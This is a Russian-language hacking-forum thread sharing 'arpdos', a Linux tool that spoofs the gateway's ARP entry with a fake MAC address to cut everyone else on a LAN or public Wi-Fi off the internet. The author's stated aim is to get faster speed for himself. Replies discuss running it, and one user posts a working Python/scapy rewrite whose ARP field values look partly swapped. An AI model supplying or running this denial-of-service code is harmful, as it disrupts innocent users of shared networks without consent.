Soft ARP-DOS | Отключение интернета у всех в LAN (кроме себя)

ARP DOS

Возникла у меня идея, а что если сделать ARP спуф, но при этом указать не существующий mac адрес в качестве носителя ip адреса шлюза? По идее тогда должен отрубиться интернет у тех, на кого направлен спуф.

Так я решил реализовать arp досер, который отключает интернет всем в локальной сети. Для себя я нашёл пользу в том, чтобы отключать в публичной wifi сети всех от интернета, тем самым получая подключение к интернету с не забитым другими людьми трафиком, а значит и более высокую скорость :]

У программы есть 1 минус, нельзя самому указать адаптер, так что надо делать так, чтобы программа запускалась когда адаптер подключенный к нужной сети использовался в качестве текущего основного подключения (и ещё, возможно, потребуется запускать с выключенным VPN, но его МОЖНО включить после начала доса)

Прога не сжирает процессор и сеть (отправляет всего 2 мелких пакета в секунду)

Запускается очень просто - sudo ./arpdos

В прикреплённом архиве исходный код и уже скомпилированный бинарник (arpdos)

P.S. К сожалению, я смог скомпилировать только для x64.
При компиляции на x86 мне выкидывает эту ошибку:

# github.com/google/gopacket/pcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.so when searching for -lpcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.a when searching for -lpcap
/usr/bin/ld: cannot find -lpcap
collect2: error: ld returned 1 exit status

Я пытался её устранить, но всё тщетно. Может кто-то из вас сможет мне помочь? T-T

 

[notBrut0r]

А, и да, забыл написать, я не стал пытаться допилить код для винды, поэтому эта программа только для линукса. Вотъ

 

[NesFeraTus]

А, и да, забыл написать, я не стал пытаться допилить код для винды, поэтому эта программа только для линукса. Вотъ

Привет, программа только для Линукс? На Parrot она пойдет?

 

[notBrut0r]

Привет, программа только для Линукс? На Parrot она пойдет?

Parrot это и есть линукс . . .

 

[roxa roxa]

у меня чтото не так?

 

[notBrut0r]

у меня чтото не так?

Да, у тебя WSL. Попробуй на нормальном линуксе запускать

 

[BredBerry]

Как всегда good!

ARP DOS

Возникла у меня идея, а что если сделать ARP спуф, но при этом указать не существующий mac адрес в качестве носителя ip адреса шлюза? По идее тогда должен отрубиться интернет у тех, на кого направлен спуф.

Так я решил реализовать arp досер, который отключает интернет всем в локальной сети. Для себя я нашёл пользу в том, чтобы отключать в публичной wifi сети всех от интернета, тем самым получая подключение к интернету с не забитым другими людьми трафиком, а значит и более высокую скорость :]

У программы есть 1 минус, нельзя самому указать адаптер, так что надо делать так, чтобы программа запускалась когда адаптер подключенный к нужной сети использовался в качестве текущего основного подключения (и ещё, возможно, потребуется запускать с выключенным VPN, но его МОЖНО включить после начала доса)

Прога не сжирает процессор и сеть (отправляет всего 2 мелких пакета в секунду)

Запускается очень просто - sudo ./arpdos

В прикреплённом архиве исходный код и уже скомпилированный бинарник (arpdos)

P.S. К сожалению, я смог скомпилировать только для x64.
При компиляции на x86 мне выкидывает эту ошибку:

# github.com/google/gopacket/pcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.so when searching for -lpcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.a when searching for -lpcap
/usr/bin/ld: cannot find -lpcap
collect2: error: ld returned 1 exit status

Я пытался её устранить, но всё тщетно. Может кто-то из вас сможет мне помочь? T-T

termux подерживает?

 

[notBrut0r]

termux подерживает?

Нет

 

[GooseBumps]

Очень понравилась идея автора, переписал на python
Работает через raw sockets (поэтому требует root'a)

# -*- coding: utf-8 -*-

import scapy.all as scapy
import argparse
import socket
import time

def get_self_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    self_ip_global = s.getsockname()[0]
    return s.getsockname()[0]
    s.close()
  
def spoof():
    # target_mac = get_mac(target_ip)
    gateway = get_masc() + str(1)
    packet = scapy.ARP(op=2, psrc=gateway, hwsrc="f4:a3:af:11:12:44",
                       hwdst='0.0.0.0', pdst="ff:ff:ff:ff:ff:ff")
    scapy.send(packet, verbose=False)
  
def get_masc():
    self_ip = get_self_ip().split('.')
    self_ip = self_ip[0] + '.' + self_ip[1] + '.' + self_ip[2] + '.'

    return self_ip

id = 0
while True:
    spoof()
    print('Пакет ' + str(id))
    id = id + 1
    time.sleep(1)

 

[Astepix]

сейчас ситуация с вашей разработкой, пашет?
какой принцип работы (простыми словами) ?

 

[GooseBumps]

сейчас ситуация с вашей разработкой, пашет?
какой принцип работы (простыми словами) ?

Почитайте что такое arp таблицы
Почитать что такое широковешатльные запросы
Все станет понятно

Отправляем широковешатльные arp request на изменение mac адреса gateway, все. Теперь все шлют запросы в пустоту, повторять каждые 5 секунд

 

[spectra122]

Такой вопрос :
Через ПК я отрубаю всех от интернета
А потом подключиться с телефона могу ?
Или это возможно только с устройства , на котором я использую arp-dos???

 

[GooseBumps]

Такой вопрос :
Через ПК я отрубаю всех от интернета
А потом подключиться с телефона могу ?
Или это возможно только с устройства , на котором я использую arp-dos???

В ответе выше есть вся инфа, надо лишь немного подумать и погуглить про широковещательный адрес